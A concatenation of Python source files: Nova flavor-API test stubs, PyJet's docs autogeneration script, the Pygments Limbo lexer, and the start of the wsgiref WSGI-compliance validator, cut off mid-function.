    """Stub for flavors.get_flavor_by_flavor_id returning a fixed flavor.

    Only flavorid varies; every other attribute is a canned test value.
    The ctxt argument is accepted for signature compatibility and ignored.
    """
    created = datetime.datetime(2012, 1, 1, 1, 1, 1, 1)
    flavor = dict(
        id=flavorid,
        flavorid=str(flavorid),
        root_gb=1,
        ephemeral_gb=1,
        name=u'test',
        deleted=False,
        created_at=created,
        updated_at=None,
        memory_mb=512,
        vcpus=1,
        extra_specs={},
        deleted_at=None,
        vcpu_weight=None,
        swap=0,
        disabled=False,
    )
    return flavor
def fake_get_all_flavors_sorted_list(context=None, inactive=False,
                                     filters=None, sort_key='flavorid',
                                     sort_dir='asc', limit=None, marker=None):
    """Stub for flavors.get_all_flavors_sorted_list.

    All filtering/sorting/pagination arguments are accepted for signature
    compatibility but ignored; two canned flavors are always returned.
    """
    return [fake_get_flavor_by_flavor_id(flavorid) for flavorid in (1, 2)]
class FlavorExtraDataTestV21(test.NoDBTestCase):
    """Checks that OS-FLV-EXT-DATA:ephemeral appears in v2.1 flavor views."""

    base_url = '/v2/fake/flavors'

    def setUp(self):
        super(FlavorExtraDataTestV21, self).setUp()
        ext = ('nova.api.openstack.compute.contrib'
               '.flavorextradata.Flavorextradata')
        self.flags(osapi_compute_extension=[ext])
        # Replace the flavor lookups with canned data so no DB is needed.
        self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
                       fake_get_flavor_by_flavor_id)
        self.stubs.Set(flavors, 'get_all_flavors_sorted_list',
                       fake_get_all_flavors_sorted_list)
        self._setup_app()

    def _setup_app(self):
        self.app = fakes.wsgi_app_v21(init_only=('flavors'))

    def _verify_flavor_response(self, flavor, expected):
        # Only the keys present in ``expected`` are checked.
        for key, value in expected.items():
            self.assertEqual(flavor[key], value)

    def _fetch_json(self, url):
        # Issue a JSON request against the app under test and decode the body.
        req = webob.Request.blank(url)
        req.headers['Content-Type'] = 'application/json'
        res = req.get_response(self.app)
        return jsonutils.loads(res.body)

    def test_show(self):
        expected = {
            'id': '1',
            'name': 'test',
            'ram': 512,
            'vcpus': 1,
            'disk': 1,
            'OS-FLV-EXT-DATA:ephemeral': 1,
        }
        body = self._fetch_json(self.base_url + '/1')
        self._verify_flavor_response(body['flavor'], expected)

    def test_detail(self):
        common = {
            'name': 'test',
            'ram': 512,
            'vcpus': 1,
            'disk': 1,
            'OS-FLV-EXT-DATA:ephemeral': 1,
        }
        expected = [dict(common, id='1'), dict(common, id='2')]
        body = self._fetch_json(self.base_url + '/detail')
        for index, flavor in enumerate(body['flavors']):
            self._verify_flavor_response(flavor, expected[index])
class FlavorExtraDataTestV2(FlavorExtraDataTestV21):
    """Runs the same assertions against the legacy v2 WSGI application."""

    def _setup_app(self):
        # Only the application factory differs from the v2.1 variant.
        self.app = fakes.wsgi_app(init_only=('flavors',))
|
abhmul/PyJet | refs/heads/master | docs/autogen.py | 1 | # -*- coding: utf-8 -*-
'''
General documentation architecture (Still more work to do here):
Home
Index
- Getting started
Getting started
FAQ
- Models
About PyJet models
explain designing and building a model
explain weight saving, weight loading
SLModel
- Layers
About PyJet layers
explain common layer functions: get_weights, set_weights, get_config
explain usage on pytorch tensors
Core Layers
Convolutional Layers
Pooling Layers
Recurrent Layers
Layer Wrappers
Writing your own PyJet layers
- Preprocessing
Image Preprocessing
Data
Losses
Metrics
Callbacks
Backend
Scikit-learn API
Utils
Contributing
'''
from __future__ import print_function
from __future__ import unicode_literals
import re
import inspect
import os
import shutil
from pyjet import utils
from pyjet import data
from pyjet import layers
from pyjet import callbacks
from pyjet import models
from pyjet import losses
from pyjet import metrics
from pyjet import backend
from pyjet import preprocessing
import sys

# Python 2 decodes mixed str/unicode as ASCII by default; force UTF-8 so
# non-ASCII docstrings do not crash the generator.  ``reload`` and
# ``sys.setdefaultencoding`` only exist on Python 2.
if sys.version[0] == '2':
    reload(sys)
    sys.setdefaultencoding('utf8')

# Member names that must never appear in the generated documentation.
EXCLUDE = {}

# One dict per generated markdown page.  Supported keys:
#   'page': output path relative to sources/
#   'functions' / 'classes': explicit members to document, in order
#   'all_module_functions' / 'all_module_classes': modules whose public
#       members are collected automatically
PAGES = [
    {
        'page': 'models/SLModel.md',
        'functions': [
            models.SLModel.cast_input_to_torch,
            models.SLModel.cast_target_to_torch,
            models.SLModel.cast_output_to_numpy,
            models.SLModel.forward,
            models.SLModel.train_on_batch,
            models.SLModel.validate_on_batch,
            models.SLModel.predict_on_batch,
            models.SLModel.fit_generator,
            models.SLModel.validate_generator,
            models.SLModel.predict_generator,
            models.SLModel.load_state,
            models.SLModel.save_state,
        ],
    },
    {
        'page': 'layers/core.md',
        'classes': [
            layers.FullyConnected,
            layers.Flatten,
        ],
    },
    {
        'page': 'layers/convolutional.md',
        'classes': [
            layers.Conv1D,
            layers.Conv2D,
            layers.Conv3D,
        ],
    },
    # {
    #     'page': 'layers/pooling.md',
    #     'classes': [
    #     ],
    # },
    {
        'page': 'layers/recurrent.md',
        'classes': [
            layers.SimpleRNN,
            layers.GRU,
            layers.LSTM,
        ],
    },
    {
        'page': 'layers/functions.md',
        'all_module_functions': [layers.functions]
    },
    {
        'page': 'metrics.md',
        'all_module_functions': [metrics],
    },
    {
        'page': 'losses.md',
        'all_module_functions': [losses],
    },
    {
        'page': 'callbacks.md',
        'all_module_classes': [callbacks],
    },
    {
        'page': 'backend.md',
        'all_module_functions': [backend],
    },
    {
        'page': 'preprocessing/image.md',
        'classes': [
            preprocessing.image.ImageDataGenerator,
        ],
        'functions': [
            preprocessing.image.ImageDataGenerator.standardize,
            preprocessing.image.ImageDataGenerator.random_transform,
        ]
    },
    {
        'page': 'data.md',
        'classes': [
            data.Dataset,
            data.NpDataset,
            data.HDF5Dataset,
            data.TorchDataset,
            data.DatasetGenerator,
        ]
    }
    # {
    # 'page': 'utils.md',
    # },
]

# Base URL used when linking classes to their documentation pages.
ROOT = 'http://pyjet.io/'
def get_earliest_class_that_defined_member(member, cls):
    """Return the most distant ancestor of ``cls`` exposing ``member``.

    Ancestors are scanned in MRO-discovery order and the *last* match wins
    (the furthest base).  Falls back to ``cls`` itself when no ancestor
    defines the member.
    """
    oldest = None
    for ancestor in get_classes_ancestors([cls]):
        if member in dir(ancestor):
            oldest = ancestor
    return oldest if oldest else cls
def get_classes_ancestors(classes):
    """Recursively collect all base classes of ``classes``, except ``object``."""
    direct_bases = []
    for cls in classes:
        direct_bases.extend(cls.__bases__)
    kept = [base for base in direct_bases if base.__name__ not in ['object']]
    if not kept:
        return kept
    # Depth-first: direct bases first, then their own ancestors.
    return kept + get_classes_ancestors(kept)
def get_function_signature(function, method=True):
    """Build a printable call signature for ``function``.

    Args:
        function: The function object; decorated wrappers may expose the
            original via a ``_original_function`` attribute.
        method: When True, the first positional argument (``self``) is
            dropped from the rendered signature.

    Returns:
        The post-processed signature string, e.g. ``module.fn(a, b=1)``.
    """
    wrapped = getattr(function, '_original_function', None)
    target = function if wrapped is None else wrapped
    # BUG FIX: inspect.getargspec was removed in Python 3.11.  Use
    # getfullargspec (same leading fields: args/defaults) when available and
    # fall back to getargspec on very old interpreters.
    getargspec = getattr(inspect, 'getfullargspec', None) or inspect.getargspec
    signature = getargspec(target)
    defaults = signature.defaults
    if method:
        args = signature.args[1:]
    else:
        args = signature.args
    if defaults:
        # Split positional args from keyword args with defaults.
        kwargs = zip(args[-len(defaults):], defaults)
        args = args[:-len(defaults)]
    else:
        kwargs = []
    st = '%s.%s(' % (function.__module__, function.__name__)
    for a in args:
        st += str(a) + ', '
    for a, v in kwargs:
        if isinstance(v, str):
            v = '\'' + v + '\''
        st += str(a) + '=' + str(v) + ', '
    if kwargs or args:
        signature = st[:-2] + ')'
    else:
        signature = st + ')'
    if not method:
        # Prepend the module name.
        signature = function.__module__ + '.' + signature
    return post_process_signature(signature)
def get_class_signature(cls):
    """Return the constructor signature string for ``cls``."""
    try:
        rendered = get_function_signature(cls.__init__)
        rendered = rendered.replace('__init__', cls.__name__)
    except (TypeError, AttributeError):
        # The class has no introspectable __init__ (e.g. it inherits
        # object's slot wrapper), so fall back to an empty call signature.
        rendered = cls.__module__ + '.' + cls.__name__ + '()'
    return post_process_signature(rendered)
def post_process_signature(signature):
    """Collapse internal module paths to the public ``pyjet.<pkg>`` form."""
    # BUG FIX: the pattern was a plain string ('\.(?!\d)'), which is an
    # invalid escape sequence and a SyntaxWarning on modern Python; use a
    # raw string.  The lookahead keeps dots inside numeric defaults intact.
    parts = re.split(r'\.(?!\d)', signature)
    if len(parts) >= 4:
        if parts[1] == 'layers':
            signature = 'pyjet.layers.' + '.'.join(parts[3:])
        if parts[1] == 'utils':
            signature = 'pyjet.utils.' + '.'.join(parts[3:])
        if parts[1] == 'backend':
            signature = 'pyjet.backend.' + '.'.join(parts[3:])
    return signature
def class_to_docs_link(cls):
    """Return the URL of the generated documentation page for ``cls``."""
    module_name = cls.__module__
    assert module_name[:6] == 'pyjet.'
    # Drop the leading package name; the site mirrors the module layout.
    relative = module_name[6:].replace('.', '/')
    return ROOT + relative + '#' + cls.__name__.lower()
def class_to_source_link(cls):
    """Return a markdown ``[[source]]`` link pointing at ``cls`` on GitHub."""
    module_name = cls.__module__
    assert module_name[:6] == 'pyjet.'
    path = module_name.replace('.', '/') + '.py'
    # getsourcelines returns (source_lines, starting_line_number).
    line = inspect.getsourcelines(cls)[-1]
    url = ('https://github.com/PyJet/'
           'tree/master/pyjet/' + path + '#L' + str(line))
    return '[[source]](' + url + ')'
def code_snippet(snippet):
    """Wrap ``snippet`` in a fenced python markdown code block."""
    return '```python\n' + snippet + '\n```\n'
def count_leading_spaces(s):
    """Return the offset of the first non-whitespace character in ``s``.

    All-whitespace (or empty) strings yield 0.
    """
    # BUG FIX: '\S' in a plain string is an invalid escape sequence
    # (SyntaxWarning on modern Python); use a raw string.
    match = re.search(r'\S', s)
    return match.start() if match else 0
def process_docstring(docstring):
    """Convert a raw docstring to markdown.

    Fenced code blocks are extracted verbatim (protected behind
    ``$CODE_BLOCK_n`` markers), ``# Section`` headers become bold markdown,
    indented ``name: description`` lines become list items, all leading
    spaces are stripped, and the code blocks are re-injected at the end.
    """
    # First, extract code blocks and process them.
    code_blocks = []
    if '```' in docstring:
        tmp = docstring[:]
        while '```' in tmp:
            # Advance to the opening fence; index spans up to and including
            # the closing fence (3 chars offset + 3 chars fence = 6).
            tmp = tmp[tmp.find('```'):]
            index = tmp[3:].find('```') + 6
            snippet = tmp[:index]
            # Place marker in docstring for later reinjection.
            docstring = docstring.replace(
                snippet, '$CODE_BLOCK_%d' % len(code_blocks))
            snippet_lines = snippet.split('\n')
            # Remove leading spaces.  The closing-fence line's indent tells
            # us how far the whole block was indented.
            num_leading_spaces = snippet_lines[-1].find('`')
            snippet_lines = ([snippet_lines[0]] +
                             [line[num_leading_spaces:]
                              for line in snippet_lines[1:]])
            # Most code snippets have 3 or 4 more leading spaces
            # on inner lines, but not all. Remove them.
            inner_lines = snippet_lines[1:-1]
            leading_spaces = None
            for line in inner_lines:
                if not line or line[0] == '\n':
                    continue
                spaces = count_leading_spaces(line)
                if leading_spaces is None:
                    leading_spaces = spaces
                if spaces < leading_spaces:
                    leading_spaces = spaces
            if leading_spaces:
                snippet_lines = ([snippet_lines[0]] +
                                 [line[leading_spaces:]
                                  for line in snippet_lines[1:-1]] +
                                 [snippet_lines[-1]])
            snippet = '\n'.join(snippet_lines)
            code_blocks.append(snippet)
            tmp = tmp[index:]
    # Format docstring section titles.
    docstring = re.sub(r'\n(\s+)# (.*)\n',
                       r'\n\1__\2__\n\n',
                       docstring)
    # Format docstring lists.
    docstring = re.sub(r'    ([^\s\\\(]+):(.*)\n',
                       r'    - __\1__:\2\n',
                       docstring)
    # Strip all leading spaces.
    lines = docstring.split('\n')
    docstring = '\n'.join([line.lstrip(' ') for line in lines])
    # Reinject code blocks.
    for i, code_block in enumerate(code_blocks):
        docstring = docstring.replace(
            '$CODE_BLOCK_%d' % i, code_block)
    return docstring
print('Cleaning up existing sources directory.')
if os.path.exists('sources'):
    shutil.rmtree('sources')

print('Populating sources directory with templates.')
# Mirror templates/ into sources/, copying only the markdown files.
for subdir, dirs, fnames in os.walk('templates'):
    for fname in fnames:
        new_subdir = subdir.replace('templates', 'sources')
        if not os.path.exists(new_subdir):
            os.makedirs(new_subdir)
        if fname[-3:] == '.md':
            fpath = os.path.join(subdir, fname)
            new_fpath = fpath.replace('templates', 'sources')
            shutil.copy(fpath, new_fpath)

# Take care of index page.
# The index is the project README with everything before the first '##'
# heading removed.
readme = open('../README.md').read()
index = open('templates/index.md').read()
index = index.replace('{{autogenerated}}', readme[readme.find('##'):])
f = open('sources/index.md', 'w')
f.write(index)
f.close()

print('Starting autogeneration.')
for page_data in PAGES:
    blocks = []
    # Collect classes: the explicit list plus every public class defined
    # directly in the modules listed under 'all_module_classes'.
    classes = page_data.get('classes', [])
    for module in page_data.get('all_module_classes', []):
        module_classes = []
        for name in dir(module):
            if name[0] == '_' or name in EXCLUDE:
                continue
            module_member = getattr(module, name)
            if inspect.isclass(module_member):
                cls = module_member
                if cls.__module__ == module.__name__:
                    if cls not in module_classes:
                        module_classes.append(cls)
        # Sort by id() so members appear in definition order, not dir() order.
        module_classes.sort(key=lambda x: id(x))
        classes += module_classes
    for cls in classes:
        subblocks = []
        signature = get_class_signature(cls)
        subblocks.append('<span style="float:right;">' +
                         class_to_source_link(cls) + '</span>')
        subblocks.append('### ' + cls.__name__ + '\n')
        subblocks.append(code_snippet(signature))
        docstring = cls.__doc__
        if docstring:
            subblocks.append(process_docstring(docstring))
        blocks.append('\n'.join(subblocks))
    # Same collection logic for free functions.
    functions = page_data.get('functions', [])
    for module in page_data.get('all_module_functions', []):
        module_functions = []
        for name in dir(module):
            if name[0] == '_' or name in EXCLUDE:
                continue
            module_member = getattr(module, name)
            if inspect.isfunction(module_member):
                function = module_member
                if module.__name__ in function.__module__:
                    if function not in module_functions:
                        module_functions.append(function)
        module_functions.sort(key=lambda x: id(x))
        functions += module_functions
    for function in functions:
        subblocks = []
        signature = get_function_signature(function, method=False)
        signature = signature.replace(function.__module__ + '.', '')
        subblocks.append('### ' + function.__name__ + '\n')
        subblocks.append(code_snippet(signature))
        docstring = function.__doc__
        if docstring:
            subblocks.append(process_docstring(docstring))
        blocks.append('\n\n'.join(subblocks))
    if not blocks:
        raise RuntimeError('Found no content for page ' +
                           page_data['page'])
    mkdown = '\n----\n\n'.join(blocks)
    # save module page.
    # Either insert content into existing page,
    # or create page otherwise
    page_name = page_data['page']
    path = os.path.join('sources', page_name)
    if os.path.exists(path):
        template = open(path).read()
        assert '{{autogenerated}}' in template, ('Template found for ' + path +
                                                 ' but missing {{autogenerated}} tag.')
        mkdown = template.replace('{{autogenerated}}', mkdown)
        print('...inserting autogenerated content into template:', path)
    else:
        print('...creating new page with autogenerated content:', path)
        subdir = os.path.dirname(path)
        if not os.path.exists(subdir):
            os.makedirs(subdir)
    open(path, 'w').write(mkdown)
# shutil.copyfile('../CONTRIBUTING.md', 'sources/contributing.md')
# © 2018 GitHub, Inc.
# Terms
# Privacy
|
brianzelip/militarization | refs/heads/gh-pages | css/basscss/node_modules/pygmentize-bundled/vendor/pygments/pygments/lexers/inferno.py | 52 | # -*- coding: utf-8 -*-
"""
pygments.lexers.inferno
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for Inferno os and all the related stuff.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Punctuation, Text, Comment, Operator, Keyword, \
Name, String, Number
__all__ = ['LimboLexer']
class LimboLexer(RegexLexer):
    """
    Lexer for `Limbo programming language <http://www.vitanuova.com/inferno/limbo.html>`_

    TODO:
        - maybe implement better var declaration highlighting
        - some simple syntax error highlighting

    .. versionadded:: 2.0
    """
    name = 'Limbo'
    aliases = ['limbo']
    filenames = ['*.b']
    mimetypes = ['text/limbo']

    tokens = {
        'whitespace': [
            # Labels ("name:") on their own line.
            (r'^(\s*)([a-zA-Z_]\w*:(\s*)\n)',
             bygroups(Text, Name.Label)),
            (r'\n', Text),
            (r'\s+', Text),
            (r'#(\n|(.|\n)*?[^\\]\n)', Comment.Single),
        ],
        'string': [
            (r'"', String, '#pop'),
            (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|'
             r'u[a-fA-F0-9]{4}|U[a-fA-F0-9]{8}|[0-7]{1,3})', String.Escape),
            (r'[^\\"\n]+', String),  # all other characters
            (r'\\', String),  # stray backslash
        ],
        'statements': [
            (r'"', String, 'string'),
            (r"'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char),
            (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+', Number.Float),
            (r'(\d+\.\d*|\.\d+|\d+[fF])', Number.Float),
            (r'16r[0-9a-fA-F]+', Number.Hex),
            (r'8r[0-7]+', Number.Oct),
            # Optional radix prefix "2r".."36r" before the digits.
            (r'((([1-3]\d)|([2-9]))r)?(\d+)', Number.Integer),
            (r'[()\[\],.]', Punctuation),
            (r'[~!%^&*+=|?:<>/-]|(->)|(<-)|(=>)|(::)', Operator),
            # BUG FIX: the implicitly-concatenated pattern strings were
            # missing '|' at both joins, creating the bogus alternatives
            # 'exitfor' and 'orpick' and leaving the keywords 'exit',
            # 'for', 'or' and 'pick' unrecognized.
            (r'(alt|break|case|continue|cyclic|do|else|exit|'
             r'for|hd|if|implement|import|include|len|load|or|'
             r'pick|return|spawn|tagof|tl|to|while)\b', Keyword),
            (r'(byte|int|big|real|string|array|chan|list|adt'
             r'|fn|ref|of|module|self|type)\b', Keyword.Type),
            (r'(con|iota|nil)\b', Keyword.Constant),
            (r'[a-zA-Z_]\w*', Name),
        ],
        'statement' : [
            include('whitespace'),
            include('statements'),
            ('[{}]', Punctuation),
            (';', Punctuation, '#pop'),
        ],
        'root': [
            include('whitespace'),
            # Empty match: every position not handled above starts a statement.
            ('', Text, 'statement'),
        ],
    }

    def analyse_text(text):
        # Any limbo module implements something
        if re.search(r'^implement \w+;', text, re.MULTILINE):
            return 0.7
# TODO:
# - Make lexers for:
# - asm sources
# - man pages
# - mkfiles
# - module definitions
# - namespace definitions
# - shell scripts
# - maybe keyfiles and fonts
# they all seem to be quite similar to their equivalents
# from unix world, so there should not be a lot of problems
|
TathagataChakraborti/resource-conflicts | refs/heads/master | PLANROB-2015/seq-sat-lama/py2.5/lib/python2.5/wsgiref/validate.py | 162 | # (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
# Only the middleware factory is public.
__all__ = ['validator']

import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings

# Valid header name token: a letter followed by letters/digits/'-'/'_'.
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
# Header values may not contain control characters (octal 000-037).
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
    """
    Raised in response to WSGI-spec-related warnings
    """
def assert_(cond, *args):
    """Raise ``AssertionError(*args)`` unless ``cond`` is true.

    Used instead of the ``assert`` statement so the checks survive
    running Python with ``-O``.
    """
    if cond:
        return
    raise AssertionError(*args)
def validator(application):
    """
    When applied between a WSGI server and a WSGI application, this
    middleware will check for WSGI compliancy on a number of levels.
    This middleware does not modify the request or response in any
    way, but will throw an AssertionError if anything seems off
    (except for a failure to close the application iterator, which
    will be printed to stderr -- there's no way to throw an exception
    at that point).
    """
    def lint_app(*args, **kw):
        # The server must call app(environ, start_response) positionally.
        assert_(len(args) == 2, "Two arguments required")
        assert_(not kw, "No keyword arguments allowed")
        environ, start_response = args
        check_environ(environ)
        # We use this to check if the application returns without
        # calling start_response:
        start_response_started = []
        def start_response_wrapper(*args, **kw):
            # start_response(status, headers[, exc_info]) -- positional only.
            assert_(len(args) == 2 or len(args) == 3, (
                "Invalid number of arguments: %s" % (args,)))
            assert_(not kw, "No keyword arguments allowed")
            status = args[0]
            headers = args[1]
            if len(args) == 3:
                exc_info = args[2]
            else:
                exc_info = None
            # Validate everything the application handed us before
            # forwarding to the server's real start_response.
            check_status(status)
            check_headers(headers)
            check_content_type(status, headers)
            check_exc_info(exc_info)
            start_response_started.append(None)
            return WriteWrapper(start_response(*args))
        # Wrap the streams so misuse by the application is caught too.
        environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
        environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
        iterator = application(environ, start_response_wrapper)
        assert_(iterator is not None and iterator != False,
            "The application must return an iterator, if only an empty list")
        check_iterator(iterator)
        # The wrapper verifies start_response ran before the first item.
        return IteratorWrapper(iterator, start_response_started)
    return lint_app
class InputWrapper:
    """Proxy for ``wsgi.input`` that validates every read call."""

    def __init__(self, wsgi_input):
        self.input = wsgi_input

    def read(self, *args):
        # The spec allows at most one (size) argument.
        assert_(len(args) <= 1)
        data = self.input.read(*args)
        assert_(type(data) is type(""))
        return data

    def readline(self):
        line = self.input.readline()
        assert_(type(line) is type(""))
        return line

    def readlines(self, *args):
        assert_(len(args) <= 1)
        result = self.input.readlines(*args)
        assert_(type(result) is type([]))
        for line in result:
            assert_(type(line) is type(""))
        return result

    def __iter__(self):
        # Delegate to readline() so every line is type-checked.
        while 1:
            line = self.readline()
            if not line:
                return
            yield line

    def close(self):
        assert_(0, "input.close() must not be called")
class ErrorWrapper:
    """Proxy for ``wsgi.errors`` that validates every write."""

    def __init__(self, wsgi_errors):
        self.errors = wsgi_errors

    def write(self, s):
        assert_(type(s) is type(""))
        self.errors.write(s)

    def flush(self):
        self.errors.flush()

    def writelines(self, seq):
        # Route through write() so each item gets type-checked.
        for item in seq:
            self.write(item)

    def close(self):
        assert_(0, "errors.close() must not be called")
class WriteWrapper:
    """Wraps the writer returned by start_response; strings only."""

    def __init__(self, wsgi_writer):
        self.writer = wsgi_writer

    def __call__(self, s):
        assert_(type(s) is type(""))
        self.writer(s)
class PartialIteratorWrapper:
    """Defers wrapping until iteration so ``__iter__`` is exercised."""

    def __init__(self, wsgi_iterator):
        self.iterator = wsgi_iterator

    def __iter__(self):
        # We want to make sure __iter__ is called
        return IteratorWrapper(self.iterator, None)
class IteratorWrapper:
    """Validates use of the application's response iterator.

    Checks that nothing is read after close(), that start_response ran
    before the first item was produced, and (via __del__) that close()
    was eventually called.
    """

    def __init__(self, wsgi_iterator, check_start_response):
        self.original_iterator = wsgi_iterator
        self.iterator = iter(wsgi_iterator)
        self.closed = False
        self.check_start_response = check_start_response

    def __iter__(self):
        return self

    def next(self):
        assert_(not self.closed,
                "Iterator read after closed")
        value = self.iterator.next()
        if self.check_start_response is not None:
            # First item produced: start_response must have run by now.
            assert_(self.check_start_response,
                    "The application returns and we started iterating over its body, but start_response has not yet been called")
            self.check_start_response = None
        return value

    def close(self):
        self.closed = True
        if hasattr(self.original_iterator, 'close'):
            self.original_iterator.close()

    def __del__(self):
        if not self.closed:
            sys.stderr.write(
                "Iterator garbage collected without being closed")
        assert_(self.closed,
                "Iterator garbage collected without being closed")
def check_environ(environ):
    """Validate the WSGI environ dict (types, required keys, path rules)."""
    # Must be a plain dict, not a subclass.
    assert_(type(environ) is DictType,
        "Environment is not of the right type: %r (environment: %r)"
        % (type(environ), environ))
    for key in ['REQUEST_METHOD', 'SERVER_NAME', 'SERVER_PORT',
                'wsgi.version', 'wsgi.input', 'wsgi.errors',
                'wsgi.multithread', 'wsgi.multiprocess',
                'wsgi.run_once']:
        assert_(key in environ,
            "Environment missing required key: %r" % (key,))
    # These two must appear without the HTTP_ prefix (CGI convention).
    for key in ['HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH']:
        assert_(key not in environ,
            "Environment should not have the key: %s "
            "(use %s instead)" % (key, key[5:]))
    if 'QUERY_STRING' not in environ:
        warnings.warn(
            'QUERY_STRING is not in the WSGI environment; the cgi '
            'module will use sys.argv when this variable is missing, '
            'so application errors are more likely',
            WSGIWarning)
    for key in environ.keys():
        if '.' in key:
            # Extension, we don't care about its type
            continue
        assert_(type(environ[key]) is StringType,
            "Environmental variable %s is not a string: %r (value: %r)"
            % (key, type(environ[key]), environ[key]))
    assert_(type(environ['wsgi.version']) is TupleType,
        "wsgi.version should be a tuple (%r)" % (environ['wsgi.version'],))
    assert_(environ['wsgi.url_scheme'] in ('http', 'https'),
        "wsgi.url_scheme unknown: %r" % environ['wsgi.url_scheme'])
    check_input(environ['wsgi.input'])
    check_errors(environ['wsgi.errors'])
    # @@: these need filling out:
    if environ['REQUEST_METHOD'] not in (
        'GET', 'HEAD', 'POST', 'OPTIONS','PUT','DELETE','TRACE'):
        warnings.warn(
            "Unknown REQUEST_METHOD: %r" % environ['REQUEST_METHOD'],
            WSGIWarning)
    assert_(not environ.get('SCRIPT_NAME')
            or environ['SCRIPT_NAME'].startswith('/'),
        "SCRIPT_NAME doesn't start with /: %r" % environ['SCRIPT_NAME'])
    assert_(not environ.get('PATH_INFO')
            or environ['PATH_INFO'].startswith('/'),
        "PATH_INFO doesn't start with /: %r" % environ['PATH_INFO'])
    if environ.get('CONTENT_LENGTH'):
        assert_(int(environ['CONTENT_LENGTH']) >= 0,
            "Invalid CONTENT_LENGTH: %r" % environ['CONTENT_LENGTH'])
    if not environ.get('SCRIPT_NAME'):
        assert_(environ.has_key('PATH_INFO'),
            "One of SCRIPT_NAME or PATH_INFO are required (PATH_INFO "
            "should at least be '/' if SCRIPT_NAME is empty)")
    assert_(environ.get('SCRIPT_NAME') != '/',
        "SCRIPT_NAME cannot be '/'; it should instead be '', and "
        "PATH_INFO should be '/'")
def check_input(wsgi_input):
    """Verify ``wsgi.input`` exposes the file-like methods WSGI requires."""
    required = ['read', 'readline', 'readlines', '__iter__']
    for attr in required:
        assert_(hasattr(wsgi_input, attr),
            "wsgi.input (%r) doesn't have the attribute %s"
            % (wsgi_input, attr))
def check_errors(wsgi_errors):
    """Verify ``wsgi.errors`` exposes the stream methods WSGI requires."""
    required = ['flush', 'write', 'writelines']
    for attr in required:
        assert_(hasattr(wsgi_errors, attr),
            "wsgi.errors (%r) doesn't have the attribute %s"
            % (wsgi_errors, attr))
def check_status(status):
    """Validate the status string passed to start_response."""
    assert_(type(status) is StringType,
        "Status must be a string (not %r)" % status)
    # Implicitly check that we can turn it into an integer:
    code_part = status.split(None, 1)[0]
    assert_(len(code_part) == 3,
        "Status codes must be three characters: %r" % code_part)
    code = int(code_part)
    assert_(code >= 100, "Status code is invalid: %r" % code)
    well_formed = len(status) >= 4 and status[3] == ' '
    if not well_formed:
        warnings.warn(
            "The status string (%r) should be a three-digit integer "
            "followed by a single space and a status explanation"
            % status, WSGIWarning)
def check_headers(headers):
    """Validate the response header list passed to start_response."""
    assert_(type(headers) is ListType,
        "Headers (%r) must be of type list: %r"
        % (headers, type(headers)))
    header_names = {}
    for item in headers:
        assert_(type(item) is TupleType,
            "Individual headers (%r) must be of type tuple: %r"
            % (item, type(item)))
        assert_(len(item) == 2)
        name, value = item
        # 'Status' belongs to CGI responses, never WSGI headers.
        assert_(name.lower() != 'status',
            "The Status header cannot be used; it conflicts with CGI "
            "script, and HTTP status is not given through headers "
            "(value: %r)." % value)
        header_names[name.lower()] = None
        assert_('\n' not in name and ':' not in name,
            "Header names may not contain ':' or '\\n': %r" % name)
        assert_(header_re.search(name), "Bad header name: %r" % name)
        assert_(not name.endswith('-') and not name.endswith('_'),
